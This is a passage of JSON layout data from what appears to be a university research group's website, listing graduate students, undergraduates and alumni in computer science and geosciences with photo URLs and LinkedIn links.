Student<br><\\/p>\"}},{\"name\":\"hop-text\",\"slot\":null,\"parentId\":\"182-c87\",\"index\":3,\"id\":\"182-c91\",\"partialId\":182,\"styleRef\":902,\"type\":\"content\",\"props\":{\"content\":\"<p>Computer Science<\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/anupam-sarker-b164b412a\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707}]},\"parentId\":\"182-c87\",\"index\":1,\"id\":\"182-c92\",\"partialId\":182,\"styleRef\":855,\"type\":\"content\",\"domuuid\":\"5-c303\"}],\"styleRef\":848,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c93\",\"parentId\":\"182-c68\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c93\",\"index\":0,\"id\":\"182-c94\",\"partialId\":182,\"styleRef\":854,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/03\\/cropped-Ardavan.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":863,\"size\":\"\"},\"domuuid\":\"182-c79\"},{\"name\":\"hop-heading\",\"parentId\":\"182-c93\",\"index\":0,\"id\":\"182-c95\",\"partialId\":182,\"styleRef\":850,\"type\":\"content\",\"props\":{\"content\":\"Ardavan Sassini\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c93\",\"index\":2,\"id\":\"182-c96\",\"partialId\":182,\"styleRef\":851,\"type\":\"content\",\"props\":{\"content\":\"<p>PhD Student<br><\\/p>\"}},{\"name\":\"hop-text\",\"slot\":null,\"parentId\":\"182-c93\",\"index\":3,\"id\":\"182-c97\",\"partialId\":182,\"styleRef\":902,\"type\":\"content\",\"props\":{\"content\":\"<p>Computer Science<br><\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/ardavansassani\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707}]},\"parentId\":\"182-c93\",\"index\":1,\"id\":\"182-c98\",\"partialId\":182,\"styleRef\":855,\"type\":\"content\",\"domuuid\":\"5-c303\"}],\"styleRef\":848,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c99\",\"parentId\":\"182-c68\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c99\",\"index\":0,\"id\":\"182-c100\",\"partialId\":182,\"styleRef\":854,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/04\\/cropped-Jean.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":1094,\"size\":\"\"},\"domuuid\":\"182-c79\"},{\"name\":\"hop-heading\",\"parentId\":\"182-c99\",\"index\":0,\"id\":\"182-c101\",\"partialId\":182,\"styleRef\":850,\"type\":\"content\",\"props\":{\"content\":\"Jean Guo\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c99\",\"index\":2,\"id\":\"182-c102\",\"partialId\":182,\"styleRef\":851,\"type\":\"content\",\"props\":{\"content\":\"<p>Ph.D. Student<\\/p>\"}},{\"name\":\"hop-text\",\"slot\":null,\"parentId\":\"182-c99\",\"index\":3,\"id\":\"182-c103\",\"partialId\":182,\"styleRef\":902,\"type\":\"content\",\"props\":{\"content\":\"<p>Computer Science<br><\\/p>\"}}],\"styleRef\":848,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c104\",\"parentId\":\"182-c68\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c104\",\"index\":0,\"id\":\"182-c105\",\"partialId\":182,\"styleRef\":854,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/03\\/cropped-Basit-2.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":838,\"size\":\"\"},\"domuuid\":\"182-c79\"},{\"name\":\"hop-heading\",\"parentId\":\"182-c104\",\"index\":0,\"id\":\"182-c106\",\"partialId\":182,\"styleRef\":850,\"type\":\"content\",\"props\":{\"content\":\"Basit Damilare Amuda\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c104\",\"index\":2,\"id\":\"182-c107\",\"partialId\":182,\"styleRef\":851,\"type\":\"content\",\"props\":{\"content\":\"<p>Master\'s Student<br><\\/p>\"}},{\"name\":\"hop-text\",\"slot\":null,\"parentId\":\"182-c104\",\"index\":3,\"id\":\"182-c108\",\"partialId\":182,\"styleRef\":902,\"type\":\"content\",\"props\":{\"content\":\"<p>Geosciences<\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"http:\\/\\/linkedin.com\\/in\\/basit-amuda-227098238\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707}]},\"parentId\":\"182-c104\",\"index\":1,\"id\":\"182-c109\",\"partialId\":182,\"styleRef\":855,\"type\":\"content\",\"domuuid\":\"5-c303\"}],\"styleRef\":848,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c110\",\"parentId\":\"182-c68\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c110\",\"index\":0,\"id\":\"182-c111\",\"partialId\":182,\"styleRef\":854,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2023\\/09\\/sara-edwards1.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":1399,\"size\":\"\"},\"domuuid\":\"182-c79\"},{\"name\":\"hop-heading\",\"parentId\":\"182-c110\",\"index\":0,\"id\":\"182-c112\",\"partialId\":182,\"styleRef\":850,\"type\":\"content\",\"props\":{\"content\":\"Sara Edwards<br>\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c110\",\"index\":2,\"id\":\"182-c113\",\"partialId\":182,\"styleRef\":851,\"type\":\"content\",\"props\":{\"content\":\"<p>Master\'s Student<br><\\/p>\"}},{\"name\":\"hop-text\",\"slot\":null,\"parentId\":\"182-c110\",\"index\":3,\"id\":\"182-c114\",\"partialId\":182,\"styleRef\":902,\"type\":\"content\",\"props\":{\"content\":\"<p>Computer Science<br><\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/sara-edwards-691b8331\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707}]},\"parentId\":\"182-c110\",\"index\":1,\"id\":\"182-c115\",\"partialId\":182,\"styleRef\":855,\"type\":\"content\",\"domuuid\":\"5-c303\"}],\"styleRef\":848,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c116\",\"parentId\":\"182-c68\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c116\",\"index\":0,\"id\":\"182-c117\",\"partialId\":182,\"styleRef\":854,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/04\\/cropped-cropped-Ryan-e1649958770354.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":1050,\"size\":\"\"},\"domuuid\":\"182-c79\"},{\"name\":\"hop-heading\",\"parentId\":\"182-c116\",\"index\":0,\"id\":\"182-c118\",\"partialId\":182,\"styleRef\":850,\"type\":\"content\",\"props\":{\"content\":\"Ryan Garland<br>\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c116\",\"index\":2,\"id\":\"182-c119\",\"partialId\":182,\"styleRef\":851,\"type\":\"content\",\"props\":{\"content\":\"<p>Master\'s Student<br><\\/p>\"}},{\"name\":\"hop-text\",\"slot\":null,\"parentId\":\"182-c116\",\"index\":3,\"id\":\"182-c120\",\"partialId\":182,\"styleRef\":902,\"type\":\"content\",\"props\":{\"content\":\"<p>Computer Science<br><\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/ryan-g-aa71a0163\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707}]},\"parentId\":\"182-c116\",\"index\":1,\"id\":\"182-c121\",\"partialId\":182,\"styleRef\":855,\"type\":\"content\",\"domuuid\":\"182-c83\"}],\"styleRef\":848,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c122\",\"parentId\":\"182-c68\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c122\",\"index\":0,\"id\":\"182-c123\",\"partialId\":182,\"styleRef\":854,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/03\\/cropped-Angelique.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":874,\"size\":\"\"},\"domuuid\":\"182-c79\"},{\"name\":\"hop-heading\",\"parentId\":\"182-c122\",\"index\":0,\"id\":\"182-c124\",\"partialId\":182,\"styleRef\":850,\"type\":\"content\",\"props\":{\"content\":\"Angelique Willis\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c122\",\"index\":2,\"id\":\"182-c125\",\"partialId\":182,\"styleRef\":851,\"type\":\"content\",\"props\":{\"content\":\"<p><span style=\\\"color: rgb(64, 85, 169); font-family: Open Sans; font-size: 16px; font-weight: 400;\\\">Master\'s Student<\\/span><\\/p>\"}},{\"name\":\"hop-text\",\"slot\":null,\"parentId\":\"182-c122\",\"index\":3,\"id\":\"182-c126\",\"partialId\":182,\"styleRef\":902,\"type\":\"content\",\"props\":{\"content\":\"<p>Geosciences<\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/angelique-willis\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707}]},\"parentId\":\"182-c122\",\"index\":1,\"id\":\"182-c127\",\"partialId\":182,\"styleRef\":855,\"type\":\"content\",\"domuuid\":\"182-c83\"}],\"styleRef\":848,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c128\",\"parentId\":\"182-c68\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c128\",\"index\":0,\"id\":\"182-c129\",\"partialId\":182,\"styleRef\":854,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/11\\/bayo-e1695781168350.jpeg\",\"caption\":{\"text\":\"\"},\"imageId\":1369,\"size\":\"\"},\"domuuid\":\"182-c79\"},{\"name\":\"hop-heading\",\"parentId\":\"182-c128\",\"index\":0,\"id\":\"182-c130\",\"partialId\":182,\"styleRef\":850,\"type\":\"content\",\"props\":{\"content\":\"Sikiru Bayo Abdulkareem\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c128\",\"index\":2,\"id\":\"182-c131\",\"partialId\":182,\"styleRef\":851,\"type\":\"content\",\"props\":{\"content\":\"<p><span style=\\\"color: rgb(64, 85, 169); font-family: Open Sans; font-size: 16px; font-weight: 400;\\\">Master\'s Student<\\/span><\\/p>\"}},{\"name\":\"hop-text\",\"slot\":null,\"parentId\":\"182-c128\",\"index\":3,\"id\":\"182-c132\",\"partialId\":182,\"styleRef\":902,\"type\":\"content\",\"props\":{\"content\":\"<p>Geosciences<\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"www.linkedin.com\\/in\\/bayonle\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707}]},\"parentId\":\"182-c128\",\"index\":1,\"id\":\"182-c133\",\"partialId\":182,\"styleRef\":855,\"type\":\"content\",\"domuuid\":\"182-c83\"}],\"styleRef\":848,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c134\",\"parentId\":\"182-c68\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c134\",\"index\":0,\"id\":\"182-c135\",\"partialId\":182,\"styleRef\":854,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2023\\/10\\/cropped-1663377340901.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":1657,\"size\":\"\"}},{\"name\":\"hop-heading\",\"parentId\":\"182-c134\",\"index\":0,\"id\":\"182-c136\",\"partialId\":182,\"styleRef\":850,\"type\":\"content\",\"props\":{\"content\":\"Shah Md Shahnewaz Sayem\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c134\",\"index\":2,\"id\":\"182-c137\",\"partialId\":182,\"styleRef\":851,\"type\":\"content\",\"props\":{\"content\":\"<p>Master\'s Student<br><\\/p>\"}},{\"name\":\"hop-text\",\"slot\":null,\"parentId\":\"182-c134\",\"index\":3,\"id\":\"182-c138\",\"partialId\":182,\"styleRef\":902,\"type\":\"content\",\"props\":{\"content\":\"<p>Geosciences<\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/shah-md-shahnewaz-sayem-767540154\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707}]},\"parentId\":\"182-c134\",\"index\":1,\"id\":\"182-c139\",\"partialId\":182,\"styleRef\":855,\"type\":\"content\",\"domuuid\":\"5-c303\"}],\"styleRef\":848,\"type\":\"content\"}],\"id\":\"182-c68\",\"parentId\":\"182-c67\",\"partialId\":182,\"styleRef\":847,\"type\":\"content\"}],\"id\":\"182-c67\",\"parentId\":\"182-c1\",\"partialId\":182,\"slots\":{\"header\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":80,\"unit\":\"%\"}}}}},\"children\":[{\"name\":\"hop-heading\",\"props\":{\"content\":\"Graduates\"},\"id\":\"182-c142\",\"parentId\":\"182-c141\",\"partialId\":182,\"styleRef\":862,\"type\":\"content\"}],\"id\":\"182-c141\",\"parentId\":\"182-c140\",\"partialId\":182,\"styleRef\":861,\"type\":\"content\"}],\"id\":\"182-c140\",\"parentId\":\"182-c67\",\"partialId\":182,\"styleRef\":860,\"type\":\"content\"}]},\"styleRef\":846,\"type\":\"content\"},{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"Undergrads\",\"attrs\":{\"id\":\"undergrads-2\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"id\":\"182-c145\",\"parentId\":\"182-c144\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c145\",\"index\":0,\"id\":\"182-c146\",\"partialId\":182,\"styleRef\":831,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2023\\/09\\/cropped-rn_image_picker_lib_temp_faf29ef5-64ad-4e05-bc96-2144c4d57790.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":1417,\"size\":\"\"}},{\"name\":\"hop-heading\",\"parentId\":\"182-c145\",\"index\":0,\"id\":\"182-c147\",\"partialId\":182,\"styleRef\":832,\"type\":\"content\",\"props\":{\"content\":\"Joshua Quiroz<br>\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c145\",\"index\":2,\"id\":\"182-c148\",\"partialId\":182,\"styleRef\":833,\"type\":\"content\",\"props\":{\"content\":\"<p>Computer Science<\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/joshua-quiroz-315713215\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707}]},\"parentId\":\"182-c145\",\"index\":1,\"id\":\"182-c149\",\"partialId\":182,\"styleRef\":835,\"type\":\"content\",\"domuuid\":\"5-c336\"}],\"styleRef\":830,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c150\",\"parentId\":\"182-c144\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c150\",\"index\":0,\"id\":\"182-c151\",\"partialId\":182,\"styleRef\":831,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2023\\/09\\/cropped-rn_image_picker_lib_temp_faf29ef5-64ad-4e05-bc96-2144c4d57790.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":1417,\"size\":\"\"}},{\"name\":\"hop-heading\",\"parentId\":\"182-c150\",\"index\":0,\"id\":\"182-c152\",\"partialId\":182,\"styleRef\":832,\"type\":\"content\",\"props\":{\"content\":\"Raiyan\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c150\",\"index\":2,\"id\":\"182-c153\",\"partialId\":182,\"styleRef\":833,\"type\":\"content\",\"props\":{\"content\":\"<p>Computer Science<\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/joshua-quiroz-315713215\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707}]},\"parentId\":\"182-c150\",\"index\":1,\"id\":\"182-c154\",\"partialId\":182,\"styleRef\":835,\"type\":\"content\",\"domuuid\":\"5-c336\"}],\"styleRef\":830,\"type\":\"content\"}],\"id\":\"182-c144\",\"parentId\":\"182-c143\",\"partialId\":182,\"styleRef\":829,\"type\":\"content\"}],\"id\":\"182-c143\",\"parentId\":\"182-c1\",\"partialId\":182,\"slots\":{\"header\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":80,\"unit\":\"%\"}}}}},\"children\":[{\"name\":\"hop-heading\",\"props\":{\"content\":\"Undergraduates\"},\"id\":\"182-c157\",\"parentId\":\"182-c156\",\"partialId\":182,\"styleRef\":844,\"type\":\"content\"}],\"id\":\"182-c156\",\"parentId\":\"182-c155\",\"partialId\":182,\"styleRef\":843,\"type\":\"content\"}],\"id\":\"182-c155\",\"parentId\":\"182-c143\",\"partialId\":182,\"styleRef\":842,\"type\":\"content\"}]},\"styleRef\":828,\"type\":\"content\"},{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"Alumni\",\"attrs\":{\"id\":\"alumni\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"id\":\"182-c160\",\"parentId\":\"182-c159\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c160\",\"index\":0,\"id\":\"182-c161\",\"partialId\":182,\"styleRef\":913,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/03\\/cropped-Sarah_Akinola-scaled-2.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":1595,\"size\":\"\"}},{\"name\":\"hop-heading\",\"parentId\":\"182-c160\",\"index\":0,\"id\":\"182-c162\",\"partialId\":182,\"styleRef\":914,\"type\":\"content\",\"props\":{\"content\":\"Sarah Akinola\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c160\",\"index\":2,\"id\":\"182-c163\",\"partialId\":182,\"styleRef\":915,\"type\":\"content\",\"props\":{\"content\":\"<p>Geosciences<br><\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/akinola-sarah-035789138\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707}]},\"parentId\":\"182-c160\",\"index\":1,\"id\":\"182-c164\",\"partialId\":182,\"styleRef\":917,\"type\":\"content\",\"domuuid\":\"5-c336\"}],\"styleRef\":912,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c165\",\"parentId\":\"182-c159\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c165\",\"index\":0,\"id\":\"182-c166\",\"partialId\":182,\"styleRef\":918,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/03\\/cropped-Anvith.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":1597,\"size\":\"\"}},{\"name\":\"hop-heading\",\"parentId\":\"182-c165\",\"index\":0,\"id\":\"182-c167\",\"partialId\":182,\"styleRef\":914,\"type\":\"content\",\"props\":{\"content\":\"Anvith Anand\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c165\",\"index\":2,\"id\":\"182-c168\",\"partialId\":182,\"styleRef\":915,\"type\":\"content\",\"props\":{\"content\":\"<p>Computer Science<br><\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/anvith-anand\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707}]},\"parentId\":\"182-c165\",\"index\":1,\"id\":\"182-c169\",\"partialId\":182,\"styleRef\":919,\"type\":\"content\",\"domuuid\":\"5-c303\"}],\"styleRef\":912,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c170\",\"parentId\":\"182-c159\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c170\",\"index\":0,\"id\":\"182-c171\",\"partialId\":182,\"styleRef\":920,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/03\\/cropped-Alex.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":884,\"size\":\"\"}},{\"name\":\"hop-heading\",\"parentId\":\"182-c170\",\"index\":0,\"id\":\"182-c172\",\"partialId\":182,\"styleRef\":914,\"type\":\"content\",\"props\":{\"content\":\"Alex Asige\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c170\",\"index\":2,\"id\":\"182-c173\",\"partialId\":182,\"styleRef\":915,\"type\":\"content\",\"props\":{\"content\":\"<p>Geosciences<br><\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/twitter\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/twitter.com\\/i\\/flow\\/login?redirect_after_login=%2FAsigeAlex\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.39751110599882}]},\"parentId\":\"182-c170\",\"index\":1,\"id\":\"182-c174\",\"partialId\":182,\"styleRef\":921,\"type\":\"content\",\"domuuid\":\"5-c336\"}],\"styleRef\":912,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c175\",\"parentId\":\"182-c159\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c175\",\"index\":0,\"id\":\"182-c176\",\"partialId\":182,\"styleRef\":922,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/03\\/cropped-Bhavya-scaled-1.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":776,\"size\":\"\"}},{\"name\":\"hop-heading\",\"parentId\":\"182-c175\",\"index\":0,\"id\":\"182-c177\",\"partialId\":182,\"styleRef\":914,\"type\":\"content\",\"props\":{\"content\":\"Bhavya Busireddy\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c175\",\"index\":2,\"id\":\"182-c178\",\"partialId\":182,\"styleRef\":915,\"type\":\"content\",\"props\":{\"content\":\"<p><span style=\\\"font-weight: 400; font-size: 16px; font-family: Open Sans; color: rgb(64, 85, 169);\\\">Computer Science<\\/span><\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/bhavya-busireddy-b052b192\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707}]},\"parentId\":\"182-c175\",\"index\":1,\"id\":\"182-c179\",\"partialId\":182,\"styleRef\":923,\"type\":\"content\",\"domuuid\":\"5-c336\"}],\"styleRef\":912,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c180\",\"parentId\":\"182-c159\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c180\",\"index\":0,\"id\":\"182-c181\",\"partialId\":182,\"styleRef\":913,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/03\\/cropped-Vineeth.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":831,\"size\":\"\"},\"domuuid\":\"182-c257\"},{\"name\":\"hop-heading\",\"parentId\":\"182-c180\",\"index\":0,\"id\":\"182-c182\",\"partialId\":182,\"styleRef\":914,\"type\":\"content\",\"props\":{\"content\":\"Vineeth Kumar Chandha\"},\"domuuid\":\"182-c258\"},{\"name\":\"hop-text\",\"parentId\":\"182-c180\",\"index\":2,\"id\":\"182-c183\",\"partialId\":182,\"styleRef\":915,\"type\":\"content\",\"props\":{\"content\":\"<p>Computer Science<br><\\/p>\"},\"domuuid\":\"182-c259\"},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/vineeth-kumar-chandha-207611149\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707}]},\"parentId\":\"182-c180\",\"index\":1,\"id\":\"182-c184\",\"partialId\":182,\"styleRef\":917,\"type\":\"content\",\"domuuid\":\"182-c261\"}],\"styleRef\":912,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c185\",\"parentId\":\"182-c159\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c185\",\"index\":0,\"id\":\"182-c186\",\"partialId\":182,\"styleRef\":913,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/04\\/cropped-sathwik-2-scaled-1.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":1007,\"size\":\"\"},\"domuuid\":\"182-c257\"},{\"name\":\"hop-heading\",\"parentId\":\"182-c185\",\"index\":0,\"id\":\"182-c187\",\"partialId\":182,\"styleRef\":914,\"type\":\"content\",\"props\":{\"content\":\"Sathwik Chowda\"},\"domuuid\":\"182-c258\"},{\"name\":\"hop-text\",\"parentId\":\"182-c185\",\"index\":2,\"id\":\"182-c188\",\"partialId\":182,\"styleRef\":915,\"type\":\"content\",\"props\":{\"content\":\"<p><span style=\\\"font-weight: 400; font-size: 16px; font-family: Open Sans; color: rgb(64, 85, 169);\\\">Computer Science<\\/span><\\/p>\"},\"domuuid\":\"182-c259\"},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/sathwikchowda\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707}]},\"parentId\":\"182-c185\",\"index\":1,\"id\":\"182-c189\",\"partialId\":182,\"styleRef\":917,\"type\":\"content\",\"domuuid\":\"182-c261\"}],\"styleRef\":912,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c190\",\"parentId\":\"182-c159\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c190\",\"index\":0,\"id\":\"182-c191\",\"partialId\":182,\"styleRef\":913,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/03\\/cropped-Brindal-1.jpeg\",\"caption\":{\"text\":\"\"},\"imageId\":1599,\"size\":\"\"},\"domuuid\":\"182-c257\"},{\"name\":\"hop-heading\",\"parentId\":\"182-c190\",\"index\":0,\"id\":\"182-c192\",\"partialId\":182,\"styleRef\":914,\"type\":\"content\",\"props\":{\"content\":\"Brindal Dhol\"},\"domuuid\":\"182-c258\"},{\"name\":\"hop-text\",\"parentId\":\"182-c190\",\"index\":2,\"id\":\"182-c193\",\"partialId\":182,\"styleRef\":915,\"type\":\"content\",\"props\":{\"content\":\"<p>Computer 